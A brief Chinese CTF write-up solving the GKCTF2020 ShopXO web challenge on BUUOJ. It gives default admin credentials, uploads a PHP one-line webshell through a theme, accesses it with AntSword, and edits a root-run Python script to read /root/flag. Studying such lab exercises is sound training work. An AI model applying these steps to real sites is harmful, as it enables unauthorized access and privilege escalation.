刷题笔记:[GKCTF2020]老八小超市儿

Web

发布日期: 2020-09-19

更新日期: 2022-01-28

文章字数: 175

阅读时长: 1 分

前言

默认后台/admin.php
默认账户admin
默认密码shopxo

题解

进后台，这种第一时间考虑主题替换，
在网上下载了个主题，然后把一句话php扔进去

路径

http://c09edc10-f98b-46fc-bac8-474ba55b4e1b.node3.buuoj.cn/public/static/index/defau../images/default-user-avatar.jpg

蚁剑访问

http://c09edc10-f98b-46fc-bac8-474ba55b4e1b.node3.buuoj.cn/public/static/index/default/1.php

flag在/root处，但权限不够，没法提权。

import os
import io
import time
os.system("whoami")
gk1=str(time.ctime())
gk="\nGet The RooT,The Date Is Useful!"
f=io.open("/flag.hint", "rb+")
f.write(str(gk1))
f.write(str(gk))
f.close()

加个一行

flag=io.open("/root/flag","r").read()
f.write(str(flag))

结束

巡璃

https://syunaht.com/p/854902497.html

本博客所有文章除特別声明外，均采用 CC BY 4.0 许可协议。转载请注明来源巡璃 !

CTF Web

刷题笔记:[2019UNCTF]666

2021-02-13 Reverse

CTF Reverse

刷题笔记:[网鼎杯 2020 朱雀组]phpweb

2020-09-18 Web

CTF Web PHP代码审计反序列化